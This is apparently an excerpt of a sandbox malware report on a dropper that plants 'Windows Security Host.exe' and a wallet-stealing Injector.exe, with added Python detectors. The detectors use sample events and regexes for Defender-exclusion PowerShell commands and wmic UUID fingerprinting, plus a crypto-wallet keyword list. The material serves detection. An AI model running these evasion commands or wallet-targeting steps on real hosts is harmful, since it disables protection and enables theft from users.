                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\Windows Security Host.exe | Queries volume information: C:\Users\user\Windows Security Host.exe VolumeInformation
                    Source: C:\Users\user\Windows Security Host.exe | Queries volume information: C:\Users\user\Windows Security Host.exe VolumeInformation
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: Amcache.hve.23.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.23.dr | Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.23.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.23.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Windows Security Host.exe, 00000003.00000002.2487632823.000000001B564000.00000004.00000020.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2487632823.000000001B5B2000.00000004.00000020.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2487632823.000000001B5E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.23.dr | Binary or memory string: MsMpEng.exe
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
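The process-creation entries in this section show the chain's defensive-evasion steps in clear text: powershell.exe launched with `-ExecutionPolicy Bypass` to run `Add-MpPreference -ExclusionPath` / `-ExclusionProcess` for the dropped Windows Security Host.exe (both the Temp copy and the copy in the user profile root), and `wmic.exe csproduct get uuid` spawned from Injector.exe to fingerprint the machine. The Python below is an added detection example, not part of the Joe Sandbox report or of the sample: it runs those checks over process-creation records in the shape of Sysmon Event ID 1 (field names `Image`, `ParentImage`, `CommandLine` follow Sysmon; Security 4688 carries the same data under other names), decodes any `-EncodedCommand` payload first so an encoded `Add-MpPreference` is caught as well, and adds a context flag when the parent image runs from a user-writable location, as the dropped EXEs here do. The events at the bottom are constructed for the example, modelled on the command lines above, plus one encoded variant and one benign control.

```python
"""Flag Defender-exclusion tampering and host-fingerprinting commands in
process-creation telemetry (Sysmon EID 1 / Security 4688 style records).
Added example; the events at the bottom are constructed, not sandbox output."""
import base64
import binascii
import re

# Rule name -> regex run against the command line (with any -EncodedCommand
# payload decoded and appended, see decode_encoded_command).
RULES = [
    ("defender_exclusion_added",
     re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.I)),
    ("execution_policy_bypass",
     re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass\b", re.I)),
    ("hwid_probe_via_wmic",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bcsproduct\b.*\bget\b.*\buuid\b", re.I)),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Parents running from Temp or straight under a profile root, like the dropped
# EXEs in this report, make the same commands far more suspicious.
USER_WRITABLE_PARENT = re.compile(r"\\appdata\\local\\temp\\|\\users\\[^\\]+\\[^\\]+\.exe$")


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand script (base64 of UTF-16LE) to the
    command line so the rules see what the script does; return the line
    unchanged when the argument is not valid base64 / UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        script = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} <decoded: {script}>"


def analyze(event: dict) -> list:
    """Names of every rule the event trips, plus a context flag when the
    parent image runs from a user-writable location."""
    cmd = decode_encoded_command(event.get("CommandLine", ""))
    hits = [name for name, rx in RULES if rx.search(cmd)]
    if hits and USER_WRITABLE_PARENT.search(event.get("ParentImage", "").lower()):
        hits.append("parent_in_user_writable_path")
    return hits


def triage(events) -> list:
    """(index, hits) for each event that trips at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = analyze(ev)
        if hits:
            out.append((i, hits))
    return out


# Constructed events modelled on the command lines in this report, plus an
# encoded variant and one benign control (hypothetical, not sandbox output).
_ENC = base64.b64encode(
    "Add-MpPreference -ExclusionProcess 'svchost.exe'".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS,
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\Windows Security Host.exe",
     "CommandLine": r'"powershell.exe" -ExecutionPolicy Bypass Add-MpPreference '
                    r"-ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Security Host.exe'"},
    {"Image": PS,
     "ParentImage": r"C:\Users\user\Windows Security Host.exe",
     "CommandLine": r'"powershell.exe" -ExecutionPolicy Bypass Add-MpPreference '
                    r"-ExclusionProcess 'Windows Security Host.exe'"},
    {"Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\Injector.exe",
     "CommandLine": '"wmic.exe" csproduct get uuid'},
    {"Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Command Get-Process"},
]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"][:60], hits)
```

`-ExecutionPolicy Bypass` on its own is common in legitimate administration, so it is kept as a weak signal that only matters in combination with the exclusion or the parent-path flag. On a live host the same tampering can be confirmed after the fact with `Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess`, and Defender records each configuration change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log.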

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED
                    Source: Yara match | File source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED
                    Source: Yara match | File source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.0.Windows Security Host.exe.450000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 8Hd0ZExgJz.exe PID: 6440, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Windows Security Host.exe PID: 6296, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\Windows Security Host.exe, type: DROPPED
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: Electrum
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: Exodus
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: Ethereum
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: keystore
                    Source: Yara matchFile source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR
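The wallet names above were recovered from a memory dump of Injector.exe, a .NET assembly. The CLR stores string literals in the #US heap as UTF-16LE, so an ASCII-only strings pass over the dropped file misses exactly the indicators the sandbox saw in memory. The scanner below is an added example (not code from the report, and not the malware's code): it matches a wallet-keyword list in both encodings and returns a verdict only when several distinct wallets are referenced. The keyword list beyond the five names in the report, the threshold, and the sample blob are this example's own assumptions.

```python
import re
from typing import Dict, List, Tuple

# Keywords the report lists as found in Injector.exe memory, plus a few further wallet
# names (the extra names are an assumption of this example, not from the report).
WALLET_KEYWORDS = [
    "Electrum", "Exodus", "Ethereum", "keystore", "com.liberty.jaxx", "Bytecoin",
    "Atomic", "Coinomi", "Guarda",
]
# A single hit (e.g. "Ethereum") occurs in benign software; require several distinct wallets.
MIN_DISTINCT_HITS = 3


def _patterns() -> List[Tuple[str, str, re.Pattern]]:
    """Compile each keyword as an ASCII pattern and as a UTF-16LE pattern."""
    pats = []
    for kw in WALLET_KEYWORDS:
        pats.append((kw, "ascii", re.compile(re.escape(kw.encode("ascii")))))
        pats.append((kw, "utf16le", re.compile(re.escape(kw.encode("utf-16-le")))))
    return pats


def scan_wallet_strings(blob: bytes) -> Dict[str, List[Tuple[str, int]]]:
    """Return {keyword: [(encoding, offset), ...]} for every wallet keyword found in blob."""
    hits: Dict[str, List[Tuple[str, int]]] = {}
    for kw, enc, pat in _patterns():
        for m in pat.finditer(blob):
            hits.setdefault(kw, []).append((enc, m.start()))
    return hits


def is_wallet_stealer(blob: bytes) -> bool:
    """Verdict: at least MIN_DISTINCT_HITS different wallet keywords present."""
    return len(scan_wallet_strings(blob)) >= MIN_DISTINCT_HITS


# Constructed sample: a mock #US-heap fragment (UTF-16LE literals, as the CLR stores them)
# followed by one ASCII string. These are not bytes from the real sample.
SAMPLE_BLOB = (
    b"\x00" * 16
    + "Electrum".encode("utf-16-le") + b"\x00\x00"
    + "com.liberty.jaxx".encode("utf-16-le") + b"\x00\x00"
    + "Exodus".encode("utf-16-le") + b"\x00\x00"
    + b"keystore\x00"          # ASCII, e.g. a path fragment
)

if __name__ == "__main__":
    for kw, locs in sorted(scan_wallet_strings(SAMPLE_BLOB).items()):
        print(f"{kw:20s} {locs}")
    print("wallet stealer:", is_wallet_stealer(SAMPLE_BLOB))
```

Run it against a dropped .NET file or a process dump; the UTF-16LE hits are the ones a plain strings run would not report.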

                    Remote Access Functionality

Source: Yara match | File source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED
Source: Yara match | File source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED
Source: Yara match | File source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Windows Security Host.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 8Hd0ZExgJz.exe PID: 6440, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Windows Security Host.exe PID: 6296, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\Windows Security Host.exe, type: DROPPED
MITRE ATT&CK Matrix (numeric prefixes are kept as they appear in the report)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
